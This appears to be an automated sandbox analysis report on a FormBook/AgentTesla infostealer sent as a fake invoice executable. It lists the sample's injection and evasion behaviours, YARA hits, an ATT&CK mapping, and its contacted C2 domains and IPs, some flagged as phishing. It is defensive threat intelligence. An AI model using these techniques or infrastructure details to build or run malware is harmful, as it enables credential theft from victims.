          Source: C:\Windows\SysWOW64\msiexec.exeCode function: memset,GetACP,LoadLibraryW,GetProcAddress,GetLocaleInfoW,FreeLibrary,FormatMessageW,memset,GetVersionExW,lstrlenW,WriteFile,WriteFile,7_2_00A25C84
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeQueries volume information: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00A29E35 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,7_2_00A29E35
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00A25C84 memset,GetACP,LoadLibraryW,GetProcAddress,GetLocaleInfoW,FreeLibrary,FormatMessageW,memset,GetVersionExW,lstrlenW,WriteFile,WriteFile,7_2_00A25C84
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 4.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4571709994.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4571667584.0000000004500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2141241119.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4570982856.00000000005D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 4.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4571709994.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4571667584.0000000004500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2141241119.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4570982856.00000000005D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Native API          		1
          DLL Side-Loading          		1
          Abuse Elevation Control Mechanism          		11
          Disable or Modify Tools          		OS Credential Dumping1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		2
          Ingress Tool Transfer          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Shared Modules          		3
          Windows Service          		1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		LSASS Memory1
          File and Directory Discovery          		Remote Desktop ProtocolData from Removable Media1
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts2
          Service Execution          		Logon Script (Windows)1
          Access Token Manipulation          		1
          Abuse Elevation Control Mechanism          		Security Account Manager224
          System Information Discovery          		SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook3
          Windows Service          		4
          Obfuscated Files or Information          		NTDS231
          Security Software Discovery          		Distributed Component Object ModelInput Capture12
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script612
          Process Injection          		12
          Software Packing          		LSA Secrets2
          Process Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Timestomp          		Cached Domain Credentials41
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          DLL Side-Loading          		DCSync1
          Application Window Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Masquerading          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt41
          Virtualization/Sandbox Evasion          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
          Access Token Manipulation          		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd612
          Process Injection          		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1465308 Sample: INVOICE  - MV CNC BANGKOK -... Startdate: 01/07/2024 Architecture: WINDOWS Score: 100 35 www.xsmci844n.xyz 2->35 37 www.vpdyt637j.xyz 2->37 39 15 other IPs or domains 2->39 47 Snort IDS alert for network traffic 2->47 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 55 13 other signatures 2->55 11 INVOICE  - MV CNC BANGKOK - ST24PJ-278.exe 4 2->11         started        signatures3 53 Performs DNS queries to domains with low reputation 37->53 process4 file5 33 INVOICE  - MV CNC ... ST24PJ-278.exe.log, ASCII 11->33 dropped 65 Adds a directory exclusion to Windows Defender 11->65 67 Injects a PE file into a foreign processes 11->67 15 INVOICE  - MV CNC BANGKOK - ST24PJ-278.exe 11->15         started        18 powershell.exe 23 11->18         started        signatures6 process7 signatures8 69 Modifies the context of a thread in another process (thread injection) 15->69 71 Maps a DLL or memory area into another process 15->71 73 Sample uses process hollowing technique 15->73 77 2 other signatures 15->77 20 explorer.exe 54 1 15->20 injected 75 Loading BitLocker PowerShell Module 18->75 24 conhost.exe 18->24         started        process9 dnsIp10 41 www.htgithub.com 103.224.182.210, 49728, 80 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 20->41 43 huskyacres.net 156.67.74.121, 49735, 80 TESONETLT United States 20->43 45 3 other IPs or domains 20->45 57 System process connects to network (likely due to code injection or exploit) 20->57 26 msiexec.exe 20->26         started        signatures11 process12 signatures13 59 Modifies the context of a thread in another process (thread injection) 26->59 61 Maps a DLL or memory area into another process 26->61 63 Switches to a custom stack to bypass stack traces 26->63 29 cmd.exe 1 26->29         started        process14 process15 31 conhost.exe 29->31         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          INVOICE - MV CNC BANGKOK - ST24PJ-278.exe92%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          INVOICE - MV CNC BANGKOK - ST24PJ-278.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          https://android.notify.windows.com/iOS0%URL Reputationsafe
          http://schemas.micro0%URL Reputationsafe
          https://api.msn.com/0%URL Reputationsafe
          http://tempuri.org/DataSet1.xsd0%Avira URL Cloudsafe
          https://api.msn.com:443/v1/news/Feed/Windows?0%Avira URL Cloudsafe
          http://www.whatsapp-p.vip100%Avira URL Cloudphishing
          http://www.whatsapp-p.vip/ps94/100%Avira URL Cloudphishing
          http://www.0909000000.com/ps94/www.parsendustriyel.com0%Avira URL Cloudsafe
          http://www.light-in-the-heavens.comReferer:0%Avira URL Cloudsafe
          https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF0%Avira URL Cloudsafe
          http://www.light-in-the-heavens.com/ps94/www.amycostellospeech.com0%Avira URL Cloudsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%Avira URL Cloudsafe
          http://www.huskyacres.net/ps94/0%Avira URL Cloudsafe
          https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-0%Avira URL Cloudsafe
          https://word.office.comM0%Avira URL Cloudsafe
          http://www.xsmci844n.xyz/ps94/0%Avira URL Cloudsafe
          http://www.0909000000.comReferer:0%Avira URL Cloudsafe
          http://www.whatsapp-p.vip/ps94/www.0909000000.com100%Avira URL Cloudphishing
          http://www.huskyacres.net0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri0%Avira URL Cloudsafe
          http://www.parsendustriyel.com0%Avira URL Cloudsafe
          http://www.hregrhherdhretdhrt.xyz/ps94/0%Avira URL Cloudsafe
          http://www.streamfly.video/ps94/www.forluvofcomedy.com0%Avira URL Cloudsafe
          http://www.xsmci844n.xyzReferer:0%Avira URL Cloudsafe
          http://www.rgrogerscreations.comReferer:0%Avira URL Cloudsafe
          http://www.htgithub.com/ps94/0%Avira URL Cloudsafe
          http://www.whatsapp-p.vipReferer:0%Avira URL Cloudsafe
          http://www.0909000000.com0%Avira URL Cloudsafe
          http://www.parsendustriyel.comReferer:0%Avira URL Cloudsafe
          https://wns.windows.com/e0%Avira URL Cloudsafe
          http://www.autoitscript.com/autoit3/J0%Avira URL Cloudsafe
          http://www.amycostellospeech.com0%Avira URL Cloudsafe
          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%Avira URL Cloudsafe
          http://www.parsendustriyel.com/ps94/0%Avira URL Cloudsafe
          http://www.xsmci844n.xyz/ps94/www.whatsapp-p.vip0%Avira URL Cloudsafe
          http://www.light-in-the-heavens.com0%Avira URL Cloudsafe
          https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%Avira URL Cloudsafe
          https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-0%Avira URL Cloudsafe
          http://www.hregrhherdhretdhrt.xyz0%Avira URL Cloudsafe
          https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc0%Avira URL Cloudsafe
          http://www.hregrhherdhretdhrt.xyzReferer:0%Avira URL Cloudsafe
          http://www.streamfly.video/ps94/0%Avira URL Cloudsafe
          http://www.norlac.xyzReferer:0%Avira URL Cloudsafe
          https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the0%Avira URL Cloudsafe
          http://www.amycostellospeech.com/ps94/0%Avira URL Cloudsafe
          http://www.forluvofcomedy.com0%Avira URL Cloudsafe
          https://outlook.come0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-0%Avira URL Cloudsafe
          http://www.vpdyt637j.xyz/ps94/0%Avira URL Cloudsafe
          http://www.amycostellospeech.comReferer:0%Avira URL Cloudsafe
          https://api.msn.com/I0%Avira URL Cloudsafe
          http://www.parsendustriyel.com/ps94/www.vpdyt637j.xyz0%Avira URL Cloudsafe
          http://www.rgrogerscreations.com0%Avira URL Cloudsafe
          https://api.msn.com/v1/news/Feed/Windows?0%Avira URL Cloudsafe
          http://www.vpdyt637j.xyz0%Avira URL Cloudsafe
          http://www.t5u2s.xyz/ps94/0%Avira URL Cloudsafe
          https://status.squarespace.com0%Avira URL Cloudsafe
          http://www.t5u2s.xyz0%Avira URL Cloudsafe
          http://www.amycostellospeech.com/ps94/www.norlac.xyz0%Avira URL Cloudsafe
          http://www.rgrogerscreations.com/ps94/0%Avira URL Cloudsafe
          http://www.huskyacres.net/ps94/www.rgrogerscreations.com0%Avira URL Cloudsafe
          http://www.streamfly.video0%Avira URL Cloudsafe
          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%Avira URL Cloudsafe
          http://www.streamfly.videoReferer:0%Avira URL Cloudsafe
          http://www.vpdyt637j.xyzReferer:0%Avira URL Cloudsafe
          http://www.norlac.xyz/ps94/0%Avira URL Cloudsafe
          http://www.forluvofcomedy.comReferer:0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h0%Avira URL Cloudsafe
          http://www.t5u2s.xyzReferer:0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu0%Avira URL Cloudsafe
          http://www.rgrogerscreations.com/ps94/www.light-in-the-heavens.com0%Avira URL Cloudsafe
          https://excel.office.com-0%Avira URL Cloudsafe
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg0%Avira URL Cloudsafe
          http://www.0909000000.com/ps94/0%Avira URL Cloudsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz0%Avira URL Cloudsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark0%Avira URL Cloudsafe
          https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA0%Avira URL Cloudsafe
          http://www.xsmci844n.xyz0%Avira URL Cloudsafe
          http://www.norlac.xyz/ps94/www.xsmci844n.xyz0%Avira URL Cloudsafe
          http://www.forluvofcomedy.com/ps94/0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c0%Avira URL Cloudsafe
          http://www.htgithub.comReferer:0%Avira URL Cloudsafe
          https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve0%Avira URL Cloudsafe
          https://powerpoint.office.comEMd0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation0%Avira URL Cloudsafe
          http://www.huskyacres.netReferer:0%Avira URL Cloudsafe
          http://www.hregrhherdhretdhrt.xyz/ps94/www.streamfly.video0%Avira URL Cloudsafe
          http://www.htgithub.com0%Avira URL Cloudsafe
          http://www.light-in-the-heavens.com/ps94/0%Avira URL Cloudsafe
          http://www.vpdyt637j.xyz/ps94/www.hregrhherdhretdhrt.xyz0%Avira URL Cloudsafe
          http://www.forluvofcomedy.com/ps94/www.t5u2s.xyz0%Avira URL Cloudsafe
          www.rgrogerscreations.com/ps94/0%Avira URL Cloudsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark0%Avira URL Cloudsafe
          https://www.msn.com:443/en-us/feed0%Avira URL Cloudsafe
          http://www.norlac.xyz0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-0%Avira URL Cloudsafe
          https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.whatsapp-p.vip
          		34.96.226.230
          		truetrue
            		unknown
            www.htgithub.com
            		103.224.182.210
            		truetrue
              		unknown
              huskyacres.net
              		156.67.74.121
              		truetrue
                		unknown
                pixie.porkbun.com
                		44.227.76.166
                		truetrue
                  		unknown
                  ext-sq.squarespace.com
                  		198.185.159.144
                  		truefalse
                    		unknown
                    gt4ucrpq.myacdn.com
                    		43.252.160.86
                    		truetrue
                      		unknown
                      light-in-the-heavens.com
                      		93.127.208.60
                      		truetrue
                        		unknown
                        www.transpecosexpress.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.0909000000.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.parsendustriyel.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.vpdyt637j.xyz
                              		unknown
                              		unknowntrue
                                		unknown
                                www.huskyacres.net
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.light-in-the-heavens.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.xsmci844n.xyz
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.amycostellospeech.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.rgrogerscreations.com
                                        		unknown
                                        		unknowntrue
                                          		unknown

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          www.rgrogerscreations.com/ps94/true
                                          • Avira URL Cloud: safe
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          http://www.whatsapp-p.vipexplorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: phishing
                                          		unknown
                                          http://www.light-in-the-heavens.com/ps94/www.amycostellospeech.comexplorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.whatsapp-p.vip/ps94/explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: phishing
                                          		unknown
